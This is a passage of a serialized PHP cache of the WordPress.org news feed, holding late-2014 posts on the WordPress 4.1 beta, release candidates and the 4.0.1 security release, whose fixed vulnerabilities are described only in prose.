href=\"https://profiles.wordpress.org/nobinobi\">Yuta Sekine</a>, <a href=\"https://profiles.wordpress.org/zrothauser\">Zack Rothauser</a>, and <a href=\"https://profiles.wordpress.org/tollmanz\">Zack Tollman</a>.\n<p>There were 283 contributors to this release, again a new high.</p>\n<p>If you want to help out or follow along, check out <a href=\"https://make.wordpress.org/\">Make WordPress</a> and our <a href=\"https://make.wordpress.org/core/\">core development blog</a>.</p>\n<p>Thanks for choosing WordPress. Happy holidays and see you next year for version 4.2!</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:46:\"https://wordpress.org/news/2014/12/dinah/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:4;a:6:{s:4:\"data\";s:45:\"\n \n \n \n \n \n \n \n\n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"WordPress 4.1 Release Candidate 3\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:69:\"https://wordpress.org/news/2014/12/wordpress-4-1-release-candidate-3/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:78:\"https://wordpress.org/news/2014/12/wordpress-4-1-release-candidate-3/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 18 Dec 2014 02:22:15 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:11:\"Development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://wordpress.org/news/?p=3411\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:429:\"The next release candidate for WordPress 4.1 is now available for testing. Seventy changes have gone in since the first release candidate. With no known issues left, we plan to release 4.1 tomorrow, December 18. To test, try the WordPress Beta Tester plugin (you’ll want “bleeding edge nightlies”). Or you can download the release candidate here (zip). If you’d like to learn more about […]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"John Blackbourn\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:1465:\"<p>The next release candidate for WordPress 4.1 is now available for testing.</p>\n<p><a href=\"https://core.trac.wordpress.org/log/trunk?rev=30961&stop_rev=30827\">Seventy changes</a> have gone in since the <a href=\"https://wordpress.org/news/2014/12/wordpress-4-1-release-candidate/\">first release candidate</a>. With no known issues left, we plan to release 4.1 tomorrow, December 18.</p>\n<p>To test, try the <a href=\"https://wordpress.org/plugins/wordpress-beta-tester/\">WordPress Beta Tester</a> plugin (you’ll want “bleeding edge nightlies”). Or you can <a href=\"https://wordpress.org/wordpress-4.1-RC3.zip\">download the release candidate here</a> (zip). If you’d like to learn more about what’s new in WordPress 4.1, visit the updated About screen in your dashboard (<strong><img src=\"https://i0.wp.com/core.svn.wordpress.org/branches/3.6/wp-content/themes/twentyten/images/wordpress.png\" alt=\"\" width=\"16\" height=\"16\" /> → About</strong> in the toolbar) and also check out <a href=\"https://wordpress.org/news/2014/11/wordpress-4-1-beta-1/\">the Beta 1 post</a>.</p>\n<p><strong>Plugin authors:</strong> Remember to test your plugins against 4.1, and if they’re compatible, make sure they are marked as tested up to 4.1. Be sure to follow along the core development blog; we’ve been posting <a href=\"https://make.wordpress.org/core/tag/4-1-dev-notes/\">notes for developers for 4.1</a> as always.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:74:\"https://wordpress.org/news/2014/12/wordpress-4-1-release-candidate-3/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:5;a:6:{s:4:\"data\";s:45:\"\n \n \n \n \n \n \n \n\n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"WordPress 4.1 Release Candidate\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"https://wordpress.org/news/2014/12/wordpress-4-1-release-candidate/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:76:\"https://wordpress.org/news/2014/12/wordpress-4-1-release-candidate/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 11 Dec 2014 11:52:16 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:3:\"4.1\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://wordpress.org/news/?p=3375\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:341:\"The release candidate for WordPress 4.1 is now available. We’ve made a lot of refinements over the last few weeks. RC means we think we’re done, but with millions of users and thousands of plugins and themes, it’s possible we’ve missed something. We hope to ship WordPress 4.1 on Tuesday, December 16, but we need your […]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"John Blackbourn\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:2301:\"<p>The release candidate for WordPress 4.1 is now available.</p>\n<p>We’ve made a lot of refinements over the last few weeks. RC means we think we’re done, but with millions of users and thousands of plugins and themes, it’s possible we’ve missed something. We hope to ship WordPress 4.1 on Tuesday, December 16, but we need your help to get there. If you haven’t tested 4.1 yet, now is the time! (Please though, not on your live site unless you’re adventurous.)</p>\n<p><strong>Think you’ve found a bug?</strong> Please post to the <a href=\"https://wordpress.org/support/forum/alphabeta/\">Alpha/Beta support forum</a>. If any known issues come up, you’ll be able to <a href=\"https://core.trac.wordpress.org/report/5\">find them here</a>.</p>\n<p>To test WordPress 4.1 RC1, you can use the <a href=\"https://wordpress.org/plugins/wordpress-beta-tester/\">WordPress Beta Tester</a> plugin or you can <a href=\"https://wordpress.org/wordpress-4.1-RC1.zip\">download the release candidate here</a> (zip). If you’d like to learn more about what’s new in WordPress 4.1, visit the About screen in your dashboard (<strong><img src=\"https://i0.wp.com/core.svn.wordpress.org/branches/3.6/wp-content/themes/twentyten/images/wordpress.png\" alt=\"\" width=\"16\" height=\"16\" /> → About</strong> in the toolbar) or check out the <a href=\"https://wordpress.org/news/2014/11/wordpress-4-1-beta-1/\">beta announcement</a>.</p>\n<p><strong>Developers</strong>, please test your plugins and themes against WordPress 4.1 and update your plugin’s <em>Tested up to</em> version in the readme to 4.1 before next week. If you find compatibility problems, we never want to break things, so please be sure to post to the support forums so we can figure those out before the final release.</p>\n<p>Be sure to <a href=\"https://make.wordpress.org/core/\">follow along the core development blog</a>, where we’ll continue to post <a href=\"https://make.wordpress.org/core/tag/4-1-dev-notes/\">notes for developers</a> for 4.1. (For example: if you’ve written a child theme for Twenty Fifteen, some of the new pagination functions have been renamed for clarity.)</p>\n<p><em>Testing four point one</em><br />\n<em>Why are we up at this hour?</em><br />\n<em>Code is poetry</em></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:72:\"https://wordpress.org/news/2014/12/wordpress-4-1-release-candidate/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:6;a:6:{s:4:\"data\";s:45:\"\n \n \n \n \n \n \n \n\n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"WordPress 4.0.1 Security Release\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"https://wordpress.org/news/2014/11/wordpress-4-0-1/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"https://wordpress.org/news/2014/11/wordpress-4-0-1/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 20 Nov 2014 18:55:18 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Security\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://wordpress.org/news/?p=3363\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:345:\"WordPress 4.0.1 is now available. This is a critical security release for all previous versions and we strongly encourage you to update your sites immediately. Sites that support automatic background updates will be updated to WordPress 4.0.1 within the next few hours. If you are still on WordPress 3.9.2, 3.8.4, or 3.7.4, you will be […]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"Andrew Nacin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:3395:\"<p>WordPress 4.0.1 is now available. This is a <strong>critical security release</strong> for all previous versions and we strongly encourage you to update your sites immediately.</p>\n<p>Sites that support automatic background updates will be updated to WordPress 4.0.1 within the next few hours. If you are still on WordPress 3.9.2, 3.8.4, or 3.7.4, you will be updated to 3.9.3, 3.8.5, or 3.7.5 to keep everything secure. (We don’t support older versions, so please update to 4.0.1 for the latest and greatest.)</p>\n<p>WordPress versions 3.9.2 and earlier are affected by a critical cross-site scripting vulnerability, which could enable anonymous users to compromise a site. This was reported by <a href=\"http://klikki.fi/\">Jouko Pynnonen</a>. This issue does not affect version 4.0, but version 4.0.1 does address these eight security issues:</p>\n<ul>\n<li>Three cross-site scripting issues that a contributor or author could use to compromise a site. Discovered by <a href=\"http://joncave.co.uk/\">Jon Cave</a>, <a href=\"http://www.miqrogroove.com/\">Robert Chapin</a>, and <a href=\"https://johnblackbourn.com/\">John Blackbourn</a> of the WordPress security team.</li>\n<li>A cross-site request forgery that could be used to trick a user into changing their password.</li>\n<li>An issue that could lead to a denial of service when passwords are checked. Reported by <a href=\"http://www.behindthefirewalls.com/\">Javier Nieto Arevalo</a> and <a href=\"http://www.devconsole.info/\">Andres Rojas Guerrero</a>.</li>\n<li>Additional protections for server-side request forgery attacks when WordPress makes HTTP requests. Reported by Ben Bidner (vortfu).</li>\n<li>An extremely unlikely hash collision could allow a user’s account to be compromised, that also required that they haven’t logged in since 2008 (I wish I were kidding). Reported by <a href=\"http://david.dw-perspective.org.uk\">David Anderson</a>.</li>\n<li>WordPress now invalidates the links in a password reset email if the user remembers their password, logs in, and changes their email address. Reported separately by <a href=\"https://twitter.com/MomenBassel\">Momen Bassel</a>, <a href=\"http://c0dehouse.blogspot.in/\">Tanoy Bose</a>, and <a href=\"https://managewp.com/\">Bojan Slavković of ManageWP</a>.</li>\n</ul>\n<p>Version 4.0.1 also fixes 23 bugs with 4.0, and we’ve made two hardening changes, including better validation of EXIF data we are extracting from uploaded photos. Reported by <a href=\"http://www.securesolutions.no/\">Chris Andrè Dale</a>.</p>\n<p>We appreciated the <a href=\"https://codex.wordpress.org/FAQ_Security\">responsible disclosure</a> of these issues directly to our security team. For more information, see the <a href=\"https://codex.wordpress.org/Version_4.0.1\">release notes</a> or consult the <a href=\"https://core.trac.wordpress.org/log/branches/4.0?rev=30475&stop_rev=29710\">list of changes</a>.</p>\n<p><a href=\"https://wordpress.org/download/\">Download WordPress 4.0.1</a> or venture over to <strong>Dashboard → Updates</strong> and simply click “Update Now”.</p>\n<p><em>Already testing WordPress 4.1? The second beta is now available (<a href=\"https://wordpress.org/wordpress-4.1-beta2.zip\">zip</a>) and it contains these security fixes. For more on 4.1, see <a href=\"https://wordpress.org/news/2014/11/wordpress-4-1-beta-1/\">the beta 1 announcement post</a>.</em></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"https://wordpress.org/news/2014/11/wordpress-4-0-1/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:7;a:6:{s:4:\"data\";s:48:\"\n \n \n \n \n \n \n \n \n\n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:20:\"WordPress 4.1 Beta 1\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"https://wordpress.org/news/2014/11/wordpress-4-1-beta-1/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:65:\"https://wordpress.org/news/2014/11/wordpress-4-1-beta-1/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 14 Nov 2014 22:35:34 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:3:{i:0;a:5:{s:4:\"data\";s:11:\"Development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:4:\"beta\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://wordpress.org/news/?p=3352\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:346:\"Welcome, everyone, to WordPress 4.1 Beta 1! This software is still in development, so we don’t recommend you run it on a production site. Consider setting up a test site just to play with the new version. To test WordPress 4.1, try the WordPress Beta Tester plugin (you’ll want “bleeding edge nightlies”). Or you can […]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"John Blackbourn\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:3409:\"<p>Welcome, everyone, to WordPress 4.1 Beta 1!</p>\n<p><strong>This software is still in development,</strong> so we don’t recommend you run it on a production site. Consider setting up a test site just to play with the new version. To test WordPress 4.1, try the <a href=\"https://wordpress.org/plugins/wordpress-beta-tester/\">WordPress Beta Tester</a> plugin (you’ll want “bleeding edge nightlies”). Or you can <a href=\"//wordpress.org/wordpress-4.1-beta1.zip\">download the beta here</a> (zip).</p>\n<p>WordPress 4.1 is due for release next month, so we need your help with testing. Here are some highlights of what to test:</p>\n<ul>\n<li>Our beautiful new default theme, <a href=\"https://make.wordpress.org/core/2014/09/09/twenty-fifteen/\">Twenty Fifteen</a>. It’s a clean, mobile-first, blog-focused theme designed through simplicity.</li>\n<li>A new <a href=\"https://make.wordpress.org/core/2014/11/11/focus-v2-demo-video/\">distraction-free writing mode for the editor</a>. It’s enabled by default for beta, and we’d love feedback on it.</li>\n<li>The ability to automatically install new language packs right from the General Settings screen (available as long as your site’s filesystem is writable).</li>\n<li>A new inline formatting toolbar for images embedded into posts.</li>\n</ul>\n<p>There have been a lot of changes for developers to test as well:</p>\n<ul>\n<li><a href=\"https://make.wordpress.org/core/2014/10/20/update-on-query-improvements-in-4-1/\">Improvements to meta, date, comment, and taxonomy queries</a>, including complex (nested, multiple relation) queries; and querying comment types (<a href=\"https://core.trac.wordpress.org/ticket/12668\">#12668</a>).</li>\n<li>A single term shared across multiple taxonomies is now split into two when updated. For more, <a href=\"https://make.wordpress.org/core/2014/11/12/an-update-on-the-taxonomy-roadmap/\">see this post</a>, <a href=\"https://core.trac.wordpress.org/ticket/5809\">#5809</a>, and <a href=\"https://core.trac.wordpress.org/ticket/30335\">#30335</a>.</li>\n<li>A new and better way for <a href=\"https://make.wordpress.org/core/2014/10/29/title-tags-in-4-1/\">themes to handle title tags</a>.</li>\n<li>Several <a href=\"https://make.wordpress.org/core/2014/10/27/toward-a-complete-javascript-api-for-the-customizer/\">improvements to the Customizer API</a>, including contextual panels and sections, and JavaScript templates for controls.</li>\n</ul>\n<p>If you want a more in-depth view of what changes have made it into 4.1, <a href=\"https://make.wordpress.org/core/tag/week-in-core/\">check out the weekly review posts</a> on the main development blog.</p>\n<p><strong>If you think you’ve found a bug</strong>, you can post to the <a href=\"https://wordpress.org/support/forum/alphabeta\">Alpha/Beta area</a> in the support forums. We’d love to hear from you! If you’re comfortable writing a reproducible bug report, <a href=\"https://make.wordpress.org/core/reports/\">file one on the WordPress Trac</a>. There, you can also find <a href=\"https://core.trac.wordpress.org/tickets/major\">a list of known bugs</a> and <a href=\"https://core.trac.wordpress.org/query?status=closed&group=component&milestone=4.1\">everything we’ve fixed</a> so far.</p>\n<p>Happy testing!</p>\n<p><em>Twenty Fifteen theme</em><br />\n<em> The beautiful face which hides</em><br />\n<em> Many improvements</em></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:61:\"https://wordpress.org/news/2014/11/wordpress-4-1-beta-1/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:8;a:6:{s:4:\"data\";s:45:\"\n \n \n \n \n \n \n \n\n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:39:\"Watch WordCamp San Francisco Livestream\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"https://wordpress.org/news/2014/10/wcsf-livestream/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"https://wordpress.org/news/2014/10/wcsf-livestream/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 24 Oct 2014 20:18:43 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:9:\"Community\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"WordCamp\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://wordpress.org/news/?p=3341\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:381:\"WordCamp San Francisco is the official annual WordPress conference, gathering the community every year since 2006. This is the time when Matt Mullenweg addresses the community in his annual State of the Word presentation – a recap of the year in WordPress and giving us a glimpse into its future. This year the speaker lineup is stellar. There will be talks by […]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:17:\"Nikolay Bachiyski\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:1975:\"<p><a title=\"2014 edition\" 